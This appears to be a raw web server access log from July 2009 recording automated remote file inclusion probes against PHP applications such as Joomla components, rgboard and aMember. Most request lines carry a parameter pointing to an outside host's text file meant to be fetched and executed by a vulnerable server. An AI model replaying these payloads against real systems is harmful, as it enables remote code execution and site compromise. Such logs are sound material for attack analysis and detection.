60.43.229.5 - - [06/Jul/2009:03:42:04 -0400] "GET /logs/access_log.Q109052800//rgboard//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:03:42:12 -0400] "GET //main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:03:42:12 -0400] "GET /logs//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:03:42:12 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:03:42:18 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:42:19 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:42:19 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:42:19 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.205.57.2 - - [06/Jul/2009:03:42:46 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jul/2009:03:42:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [06/Jul/2009:03:43:41 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:43:41 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:43:42 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:43:59 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:43:59 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:43:59 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:44:10 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [06/Jul/2009:03:44:12 -0400] "GET /logs/access_log.Q109051800/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
217.125.38.117 - - [06/Jul/2009:03:44:22 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:44:22 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:44:22 -0400] "GET /logs/access_log.Q109062300%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:03:44:40 -0400] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:03:44:40 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:03:44:51 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
66.249.68.70 - - [06/Jul/2009:03:44:53 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
60.43.229.5 - - [06/Jul/2009:03:45:00 -0400] "GET /logs/access_log.Q109052800%20%20//rgboard//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
83.16.182.130 - - [06/Jul/2009:03:45:15 -0400] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
83.16.182.130 - - [06/Jul/2009:03:45:15 -0400] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.16.182.130 - - [06/Jul/2009:03:45:15 -0400] "GET /logs/access_log.Q109060500%20%20//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:45:16 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:45:17 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:45:18 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:45:25 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:45:32 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:45:45 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:45:45 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:45:45 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:45:46 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:45:47 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:45:47 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.123.96 - - [06/Jul/2009:03:45:48 -0400] "GET /logs/access_log.Q109051700/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.108.123.96 - - [06/Jul/2009:03:45:48 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.108.123.96 - - [06/Jul/2009:03:45:48 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
195.34.78.110 - - [06/Jul/2009:03:45:50 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:45:50 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:45:50 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:45:55 -0400] "GET //include/lib.inc.php?site_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:45:55 -0400] "GET /logs//include/lib.inc.php?site_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:45:55 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:45:57 -0400] "GET /logs/access_log.Q109050700//include/lib.inc.php?site_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:46:00 -0400] "GET /logs/access_log.Q109051700%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
195.34.78.110 - - [06/Jul/2009:03:46:06 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:46:09 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:46:17 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET /logs/access_log.Q109052800//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET /logs/access_log.Q109052800//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET /logs/access_log.Q109052800//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET //rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET //rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET //rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET /logs//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET /logs//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:46:35 -0400] "GET /logs//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.125.38.117 - - [06/Jul/2009:03:46:48 -0400] "GET /logs/access_log.Q109062300%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
204.9.247.53 - - [06/Jul/2009:03:47:01 -0400] "GET /logs/error_log.Q109052800//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:47:01 -0400] "GET /logs/error_log.Q109052800//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:47:01 -0400] "GET /logs/error_log.Q109052800//rgboard//include/mail.inc.php?skin_board_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
209.51.133.202 - - [06/Jul/2009:03:47:11 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:47:12 -0400] "GET /logs/access_log.Q109050700%20%20//include/lib.inc.php?site_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:47:19 -0400] "GET /logs/access_log.Q109052000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:03:47:37 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:03:47:37 -0400] "GET //modules/xfsection/modify.php?dir_module=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:03:47:37 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:03:47:55 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:03:47:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.238.52.141 - - [06/Jul/2009:03:49:03 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:49:03 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:49:03 -0400] "GET /logs/access_log.Q109051200//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
213.201.230.140 - - [06/Jul/2009:03:49:19 -0400] "GET /logs/access_log.Q109060400//sb/index.php?sb_include_path=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
213.201.230.140 - - [06/Jul/2009:03:49:19 -0400] "GET //sb/index.php?sb_include_path=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
213.201.230.140 - - [06/Jul/2009:03:49:20 -0400] "GET /logs//sb/index.php?sb_include_path=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
67.19.130.218 - - [06/Jul/2009:03:49:26 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:03:49:26 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:03:49:26 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:03:49:27 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
213.201.230.140 - - [06/Jul/2009:03:49:39 -0400] "GET /logs/error_log.Q109053000//sb/index.php?sb_include_path=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
87.106.179.130 - - [06/Jul/2009:03:50:23 -0400] "GET //components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:03:50:50 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:51:03 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:51:04 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:51:07 -0400] "GET /logs/access_log.Q109061800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:51:21 -0400] "GET /logs/access_log.Q109061800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:51:22 -0400] "GET /logs/access_log.Q109061800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.230.9.68 - - [06/Jul/2009:03:52:32 -0400] "GET /logs/access_log.Q109062500/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.9.68 - - [06/Jul/2009:03:52:32 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.9.68 - - [06/Jul/2009:03:52:32 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [06/Jul/2009:03:52:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.85.176 - - [06/Jul/2009:03:53:16 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:03:53:16 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:03:53:16 -0400] "GET /logs/access_log.Q109060200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:03:53:35 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:03:53:35 -0400] "GET /logs/access_log.Q109060200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:03:53:35 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:03:54:24 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:03:54:25 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:03:54:25 -0400] "GET /logs/access_log.Q109060200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
204.9.247.53 - - [06/Jul/2009:03:55:08 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:09 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:09 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:16 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:17 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:17 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:27 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:27 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:27 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:53 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:54 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:55:58 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
61.78.62.84 - - [06/Jul/2009:03:56:28 -0400] "GET //include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:56:28 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:56:28 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
